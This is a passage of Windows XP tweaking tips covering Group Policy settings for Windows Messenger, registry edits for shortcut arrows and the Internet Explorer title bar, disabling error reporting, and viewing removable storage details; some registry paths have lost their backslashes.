appears right click on the Connection and click on the Advanced tab. Check or
uncheck the box according t

close windows messenger

-Computer Configuration
-Administrative Templates
-Windows Components
-Windows Messenger
Here you can enable
"Do not allow Windows Messenger to be run"
"Do not automatically start Windows Messenger initially"
remove shortcut arrow from desktop icons
Here's how you can remove those shortcut arrows from your desktop icons in Windows

1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOTlnkfile
3. Delete the IsShortcut registry value.

You may need to restart Windows XP.


n regedit navigate to this key:

HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain

change the value of the string "Window Title" to whatever you want on the title
bar of Internet Explorer - to have no title except the title of the web pages you
are browsing do not enter anything for a value


Open Control Panel

Click on Performance and Maintenance.
Click on System.
Then click on the Advanced tab
Click on the error-reporting button on the bottom of the windows.
Select Disable error reporting.
Click OK


Right click on My Computer

Click on Manage

Click on Storage and expand the list.

Removable Storage/Libraries
Right click on your drive and click on property

Click on the 2nd tab which is called "Device Information"

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